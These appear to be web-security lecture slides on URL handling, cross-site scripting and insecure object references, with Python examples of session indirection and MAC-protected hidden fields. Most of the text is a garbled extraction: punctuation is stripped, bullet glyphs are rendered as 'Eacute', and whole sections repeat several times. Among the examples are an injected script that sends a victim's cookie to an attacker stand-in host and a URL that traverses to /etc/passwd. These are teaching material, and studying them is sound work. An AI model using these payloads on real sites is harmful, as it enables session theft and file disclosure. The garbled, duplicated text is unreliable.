A genius clearly
Solutions for object referencingRe-validate
Eacute Check authorization againEacute Obvious solution but duplicates effort
Add a data indirection
Eacute Session-specific server side array of account nos
ltoption value=1gt12345678901ltoptiongtltoption value=2gt12346543210ltoptiongt
Eacute Similarly for file access
httpresearchsiteedacukshowhtmlphpfile=1Introduction
for many files a hash table or database could be used
Passing too much information
Old flaw passing unnecessary information to client andexpecting it back unmodified
ltform action=cgi-bincgimailexe method=postgtltinput type=hidden name=$File$
value=templatesfeedbacktxtgtltinput type=hidden name=$To$
value=feedbacksomesiteexamplegtltformgt
Protecting information in server data
Sometimes the server must pass information to theclient during the interaction but must protect it
Example editing a wiki page
ltformgtltinput type=hidden name=pagename value=NineteenSixtiesToysgtlttextarea cols=80 rows=25 name=wpTextgt
ltformgt
Solution add a MAC constructed with a server-sidesecret key
ltinput type=hidden name=pagemacvalue=bc9faaae1e35d52f3dea9651da12cd36627b8403gt
Or could encrypt the pagename
Other authorization mistakes
Assuming requests occur in proper order
Eacute For an admin task (eg password reset) assumingthat user must have issued a GET to retrieve a formbefore a POSTEacute only checking authorization on first step
Authorization by obscurity
Eacute Supposing that because a web page is not linked tothe main site only people who are given it will beable to reach it
httpwwwmyservercomsecretareaprivatepaperpdf
Review questionsURLs
Eacute Recap the 8 components of a URL From a serverside point of view which of these is trustworthyFrom the web app viewpoint which of these is itmost important to validate in output to protectyour users
XSS
Eacute Explain how session stealing works with XSS Howcould a reflected XSS attack steal a session
Object references
Eacute Why is it important to add defence-in-depth whenconfiguring web servers Give three examples ofways in which a web application may be restrictedby a (separate) server
References
Some commentary and examples were taken from thetexts
Eacute Innocent Code a security wake-up call for webprogrammers by Sverre H Huseby Wiley 2004
Eacute The Tangled Web a Guide to Securing Modern WebApplications by Michal Zelewski No Starch Press2012 (Recommended)
as well as the named RFCs
- Overview
- Basics URLs
- Output Filtering and XSS
- Object references
Example injected script
ltscriptgtdocumentlocationreplace(httpwwwbadguyexamplestealphp+ what= + documentcookie)
ltscriptgt
Eacute redirects victimrsquos browser to attackers site passingcookie
Eacute might also pass currently visited web pageEacute then attackers server can issue a redirect back
again
Reflected XSSReflected XSS occurs when injected malicious codeisnrsquot stored in server but is immediately displayed inthe visited page Suppose
httpmymanpagesorgmanpagephptitle=Man+GCCprogram=gccgt
dynamically makes HTML embedding title directly
lth1gtMan GCClth1gt
An attacker could use this with a malicious input
title=ltscriptgtltscriptgtprogram=gcc
which eg steals a cookie
Exercise Explain how this attack works in practice
XSS SolutionsInput processing tricky need to understand data flowthrough app quoting encoding passed tofromfunctions databases etc Hence output filtering
Plain output HTML encoding
Eacute Stored data values need to be encoded to representin HTML (eg lt converted to amplt etc)
Marked up output complex filtering
Eacute Need to work through tags in input and rule outrisky ones Scripts may appear in attributes Flaky
Marked up output DSL
Eacute A better approach use a dedicated syntax convertto restricted subset of HTML
Outline
Overview
Basics URLs
Output Filtering and XSS
Object references
Embarrassing PHP blunders
httpresearchsiteedacukshowhtmlphptitle=User+Manualampfile=release2FUsermanhtmlIntroduction
A ldquocoolrdquo PHP script showhtmlphp
Eacute take a plain HTML fileEacute wrap it with navigation links site styleEacute convert the internal links to reference back to
wrapped version
Embarrassing PHP blunders
httpresearchsiteedacukshowhtmlphptitle=User+Manualampfile=2Fetc25passwd
Eacute remote users can visit any file on the systemEacute mistake motivates defence-in-depth
Eacute http server should not serve up any fileEacute use internal web server config (separate apps)Eacute and external OS config (eg nobody user chroot)
Authorization and object access
What was the problem here
Eacute the app developer (implicitly) authorized usersEacute to read documentation files he had createdEacute project was open source no need for loginsEacute app contained no paths to files outside the projectEacute so no explicit authorization code was written
Eacute but PHP code didnrsquot check the filename returnedEacute showhtmlphp provided access to server objectsEacute input validation only checked for file existence
There should have been a re-authorization stepA well-written app should only allow access to its ownresources
Looking at anyonersquos bank account
ltform action=show-accountasp method=getgtAccount to displayltselect name=accountgt
ltoption value=12345678901gt12345678901ltoptiongtltoption value=12346543210gt12346543210ltoptiongt
ltselectgtltinput type=submit name=show value=Show Accountgt
ltformgt
Example from Innocent Code based on a Norwegian newspaperstory about a ldquo17-year geek able to view anyonersquos bank accountrdquo
A genius clearly
Solutions for object referencingRe-validate
Eacute Check authorization againEacute Obvious solution but duplicates effort
Add a data indirection
Eacute Session-specific server side array of account nos
ltoption value=1gt12345678901ltoptiongtltoption value=2gt12346543210ltoptiongt
Eacute Similarly for file access
httpresearchsiteedacukshowhtmlphpfile=1Introduction
for many files a hash table or database could be used
Passing too much information
Old flaw passing unnecessary information to client andexpecting it back unmodified
ltform action=cgi-bincgimailexe method=postgtltinput type=hidden name=$File$
value=templatesfeedbacktxtgtltinput type=hidden name=$To$
value=feedbacksomesiteexamplegtltformgt
Protecting information in server data
Sometimes the server must pass information to theclient during the interaction but must protect it
Example editing a wiki page
ltformgtltinput type=hidden name=pagename value=NineteenSixtiesToysgtlttextarea cols=80 rows=25 name=wpTextgt
ltformgt
Solution add a MAC constructed with a server-sidesecret key
ltinput type=hidden name=pagemacvalue=bc9faaae1e35d52f3dea9651da12cd36627b8403gt
Or could encrypt the pagename
Other authorization mistakes
Assuming requests occur in proper order
Eacute For an admin task (eg password reset) assumingthat user must have issued a GET to retrieve a formbefore a POSTEacute only checking authorization on first step
Authorization by obscurity
Eacute Supposing that because a web page is not linked tothe main site only people who are given it will beable to reach it
httpwwwmyservercomsecretareaprivatepaperpdf
Review questionsURLs
Eacute Recap the 8 components of a URL From a serverside point of view which of these is trustworthyFrom the web app viewpoint which of these is itmost important to validate in output to protectyour users
XSS
Eacute Explain how session stealing works with XSS Howcould a reflected XSS attack steal a session
Object references
Eacute Why is it important to add defence-in-depth whenconfiguring web servers Give three examples ofways in which a web application may be restrictedby a (separate) server
References
Some commentary and examples were taken from thetexts
Eacute Innocent Code a security wake-up call for webprogrammers by Sverre H Huseby Wiley 2004
Eacute The Tangled Web a Guide to Securing Modern WebApplications by Michal Zelewski No Starch Press2012 (Recommended)
as well as the named RFCs
- Overview
- Basics URLs
- Output Filtering and XSS
- Object references
Reflected XSSReflected XSS occurs when injected malicious codeisnrsquot stored in server but is immediately displayed inthe visited page Suppose
httpmymanpagesorgmanpagephptitle=Man+GCCprogram=gccgt
dynamically makes HTML embedding title directly
lth1gtMan GCClth1gt
An attacker could use this with a malicious input
title=ltscriptgtltscriptgtprogram=gcc
which eg steals a cookie
Exercise Explain how this attack works in practice
XSS SolutionsInput processing tricky need to understand data flowthrough app quoting encoding passed tofromfunctions databases etc Hence output filtering
Plain output HTML encoding
Eacute Stored data values need to be encoded to representin HTML (eg lt converted to amplt etc)
Marked up output complex filtering
Eacute Need to work through tags in input and rule outrisky ones Scripts may appear in attributes Flaky
Marked up output DSL
Eacute A better approach use a dedicated syntax convertto restricted subset of HTML
Outline
Overview
Basics URLs
Output Filtering and XSS
Object references
Embarrassing PHP blunders
httpresearchsiteedacukshowhtmlphptitle=User+Manualampfile=release2FUsermanhtmlIntroduction
A ldquocoolrdquo PHP script showhtmlphp
Eacute take a plain HTML fileEacute wrap it with navigation links site styleEacute convert the internal links to reference back to
wrapped version
Embarrassing PHP blunders
httpresearchsiteedacukshowhtmlphptitle=User+Manualampfile=2Fetc25passwd
Eacute remote users can visit any file on the systemEacute mistake motivates defence-in-depth
Eacute http server should not serve up any fileEacute use internal web server config (separate apps)Eacute and external OS config (eg nobody user chroot)
Authorization and object access
What was the problem here
Eacute the app developer (implicitly) authorized usersEacute to read documentation files he had createdEacute project was open source no need for loginsEacute app contained no paths to files outside the projectEacute so no explicit authorization code was written
Eacute but PHP code didnrsquot check the filename returnedEacute showhtmlphp provided access to server objectsEacute input validation only checked for file existence
There should have been a re-authorization stepA well-written app should only allow access to its ownresources
Looking at anyonersquos bank account
ltform action=show-accountasp method=getgtAccount to displayltselect name=accountgt
ltoption value=12345678901gt12345678901ltoptiongtltoption value=12346543210gt12346543210ltoptiongt
ltselectgtltinput type=submit name=show value=Show Accountgt
ltformgt
Example from Innocent Code based on a Norwegian newspaperstory about a ldquo17-year geek able to view anyonersquos bank accountrdquo
A genius clearly
Solutions for object referencingRe-validate
Eacute Check authorization againEacute Obvious solution but duplicates effort
Add a data indirection
Eacute Session-specific server side array of account nos
ltoption value=1gt12345678901ltoptiongtltoption value=2gt12346543210ltoptiongt
Eacute Similarly for file access
httpresearchsiteedacukshowhtmlphpfile=1Introduction
for many files a hash table or database could be used
Passing too much information
Old flaw passing unnecessary information to client andexpecting it back unmodified
ltform action=cgi-bincgimailexe method=postgtltinput type=hidden name=$File$
value=templatesfeedbacktxtgtltinput type=hidden name=$To$
value=feedbacksomesiteexamplegtltformgt
Protecting information in server data
Sometimes the server must pass information to theclient during the interaction but must protect it
Example editing a wiki page
ltformgtltinput type=hidden name=pagename value=NineteenSixtiesToysgtlttextarea cols=80 rows=25 name=wpTextgt
ltformgt
Solution add a MAC constructed with a server-sidesecret key
ltinput type=hidden name=pagemacvalue=bc9faaae1e35d52f3dea9651da12cd36627b8403gt
Or could encrypt the pagename
Other authorization mistakes
Assuming requests occur in proper order
Eacute For an admin task (eg password reset) assumingthat user must have issued a GET to retrieve a formbefore a POSTEacute only checking authorization on first step
Authorization by obscurity
Eacute Supposing that because a web page is not linked tothe main site only people who are given it will beable to reach it
httpwwwmyservercomsecretareaprivatepaperpdf
Review questionsURLs
Eacute Recap the 8 components of a URL From a serverside point of view which of these is trustworthyFrom the web app viewpoint which of these is itmost important to validate in output to protectyour users
XSS
Eacute Explain how session stealing works with XSS Howcould a reflected XSS attack steal a session
Object references
Eacute Why is it important to add defence-in-depth whenconfiguring web servers Give three examples ofways in which a web application may be restrictedby a (separate) server
References
Some commentary and examples were taken from thetexts
Eacute Innocent Code a security wake-up call for webprogrammers by Sverre H Huseby Wiley 2004
Eacute The Tangled Web a Guide to Securing Modern WebApplications by Michal Zelewski No Starch Press2012 (Recommended)
as well as the named RFCs
- Overview
- Basics URLs
- Output Filtering and XSS
- Object references
XSS SolutionsInput processing tricky need to understand data flowthrough app quoting encoding passed tofromfunctions databases etc Hence output filtering
Plain output HTML encoding
Eacute Stored data values need to be encoded to representin HTML (eg lt converted to amplt etc)
Marked up output complex filtering
Eacute Need to work through tags in input and rule outrisky ones Scripts may appear in attributes Flaky
Marked up output DSL
Eacute A better approach use a dedicated syntax convertto restricted subset of HTML
Outline
Overview
Basics URLs
Output Filtering and XSS
Object references
Embarrassing PHP blunders
httpresearchsiteedacukshowhtmlphptitle=User+Manualampfile=release2FUsermanhtmlIntroduction
A ldquocoolrdquo PHP script showhtmlphp
Eacute take a plain HTML fileEacute wrap it with navigation links site styleEacute convert the internal links to reference back to
wrapped version
Embarrassing PHP blunders
httpresearchsiteedacukshowhtmlphptitle=User+Manualampfile=2Fetc25passwd
Eacute remote users can visit any file on the systemEacute mistake motivates defence-in-depth
Eacute http server should not serve up any fileEacute use internal web server config (separate apps)Eacute and external OS config (eg nobody user chroot)
Authorization and object access
What was the problem here
Eacute the app developer (implicitly) authorized usersEacute to read documentation files he had createdEacute project was open source no need for loginsEacute app contained no paths to files outside the projectEacute so no explicit authorization code was written
Eacute but PHP code didnrsquot check the filename returnedEacute showhtmlphp provided access to server objectsEacute input validation only checked for file existence
There should have been a re-authorization stepA well-written app should only allow access to its ownresources
Looking at anyone's bank account

    <form action="show-account.asp" method="get">
    Account to display:
    <select name="account">
    <option value="12345678901">12345678901</option>
    <option value="12346543210">12346543210</option>
    </select>
    <input type="submit" name="show" value="Show Account">
    </form>

Example from Innocent Code, based on a Norwegian newspaper story about a "17-year geek able to view anyone's bank account".

A genius, clearly.
Solutions for object referencing

Re-validate
- Check authorization again
- Obvious solution, but duplicates effort

Add a data indirection
- Session-specific server-side array of account nos.

    <option value="1">12345678901</option>
    <option value="2">12346543210</option>

- Similarly for file access:

    http://research.site.ed.ac.uk/showhtml.php?file=1#Introduction

  For many files, a hash table or database could be used.
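The data indirection above, written out as an added example (not the lecture's code): a per-session table hands the client small indexes and resolves them back on the server, so a submitted raw account number or file path matches nothing. The account numbers and file name are the slide's sample values; the class and handler names are assumptions.

```python
import html
from typing import Dict, Iterable, Optional


class SessionObjectMap:
    """Per-session table mapping small opaque indexes to real object references.

    The client only ever sees the index. The real account number or file path
    never leaves the server, so the client cannot substitute a different one:
    any index it sends resolves either to an object this session was already
    shown, or to nothing at all.
    """

    def __init__(self) -> None:
        self._by_index: Dict[str, str] = {}
        self._by_ref: Dict[str, str] = {}

    def register(self, real_ref: str) -> str:
        """Return the index for real_ref, allocating one on first use."""
        if real_ref in self._by_ref:
            return self._by_ref[real_ref]
        # Sequential is fine: guessing "3" gains nothing, the table is per session.
        index = str(len(self._by_index) + 1)
        self._by_index[index] = real_ref
        self._by_ref[real_ref] = index
        return index

    def resolve(self, index: str) -> Optional[str]:
        """Map a client-supplied index back to the real reference, or None."""
        return self._by_index.get(index)


def build_account_options(session: SessionObjectMap, accounts: Iterable[str]) -> str:
    """Render the <option> tags for the account form, indexes as values."""
    return "".join(
        f'<option value="{session.register(acct)}">{html.escape(acct)}</option>'
        for acct in accounts
    )


def show_account(session: SessionObjectMap, submitted_value: str) -> Optional[str]:
    """Handler for show-account: resolve the index, refuse anything unknown."""
    real = session.resolve(submitted_value)
    if real is None:
        return None  # not one of this session's objects (e.g. a raw account number)
    return f"balance page for {real}"


def show_html(session: SessionObjectMap, submitted_value: str) -> Optional[str]:
    """showhtml.php with indirection: only files registered for this session."""
    real = session.resolve(submitted_value)
    if real is None:
        return None  # "/etc/passwd" or any other path is simply not in the table
    return f"wrapped view of {real}"
```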
Passing too much information

Old flaw: passing unnecessary information to the client and expecting it back unmodified.

    <form action="cgi-bin/cgimail.exe" method="post">
    <input type="hidden" name="$File$" value="templates/feedback.txt">
    <input type="hidden" name="$To$" value="feedback@somesite.example">
    </form>
Protecting information in server data

Sometimes the server must pass information to the client during the interaction, but must protect it.

Example: editing a wiki page

    <form>
    <input type="hidden" name="pagename" value="NineteenSixtiesToys">
    <textarea cols="80" rows="25" name="wpText">
    </textarea>
    </form>

Solution: add a MAC constructed with a server-side secret key:

    <input type="hidden" name="pagemac" value="bc9faaae1e35d52f3dea9651da12cd36627b8403">

Or could encrypt the pagename.
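The MAC'd hidden field, as an added example rather than the lecture's code: the server emits pagename together with an HMAC over it and, on submission, accepts the pagename only if the MAC verifies. The secret value, the use of HMAC-SHA256 (the slide's sample MAC is 40 hex digits, SHA-1 length) and the binding to a session id are assumptions made here.

```python
import hashlib
import hmac
import html
from typing import Mapping, Optional

# Constructed demo key. In a real deployment the key is loaded from
# configuration, never embedded in source.
SERVER_SECRET = b"constructed-demo-secret-for-this-example"


def page_mac(pagename: str, session_id: str, key: bytes = SERVER_SECRET) -> str:
    """HMAC-SHA256 over the field value.

    The session id is mixed in (assumption, not on the slide) so a MAC'd field
    captured in one session cannot be replayed from another. A separator keeps
    (session, pagename) pairs from colliding.
    """
    msg = session_id.encode("utf-8") + b"\x00" + pagename.encode("utf-8")
    return hmac.new(key, msg, hashlib.sha256).hexdigest()


def hidden_fields(pagename: str, session_id: str) -> str:
    """Emit the two hidden fields for the edit form: pagename plus its MAC."""
    mac = page_mac(pagename, session_id)
    return (
        f'<input type="hidden" name="pagename" value="{html.escape(pagename, quote=True)}">'
        f'<input type="hidden" name="pagemac" value="{mac}">'
    )


def verified_pagename(form: Mapping[str, str], session_id: str) -> Optional[str]:
    """On submission: return pagename only if its MAC checks out, else None.

    The MAC gives integrity, not secrecy: the client can still read pagename.
    If it must also be hidden from the client, encrypt it (the slide's
    alternative) and MAC the ciphertext.
    """
    pagename = form.get("pagename")
    mac = form.get("pagemac")
    if pagename is None or mac is None:
        return None
    expected = page_mac(pagename, session_id)
    # Constant-time comparison: a plain == leaks timing about the prefix match.
    if not hmac.compare_digest(expected, mac):
        return None
    return pagename
```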
Other authorization mistakes

Assuming requests occur in proper order
- For an admin task (e.g. password reset), assuming that the user must have issued a GET to retrieve a form before a POST
- only checking authorization on the first step

Authorization by obscurity
- Supposing that because a web page is not linked to from the main site, only people who are given it will be able to reach it:

    http://www.myserver.com/secretarea/privatepaper.pdf
Review questions

URLs
- Recap the 8 components of a URL. From a server-side point of view, which of these is trustworthy? From the web app viewpoint, which of these is it most important to validate in output to protect your users?

XSS
- Explain how session stealing works with XSS. How could a reflected XSS attack steal a session?

Object references
- Why is it important to add defence-in-depth when configuring web servers? Give three examples of ways in which a web application may be restricted by a (separate) server.
References

Some commentary and examples were taken from the texts:
- Innocent Code: A Security Wake-Up Call for Web Programmers, by Sverre H. Huseby, Wiley, 2004
- The Tangled Web: A Guide to Securing Modern Web Applications, by Michal Zalewski, No Starch Press, 2012 (Recommended)

as well as the named RFCs.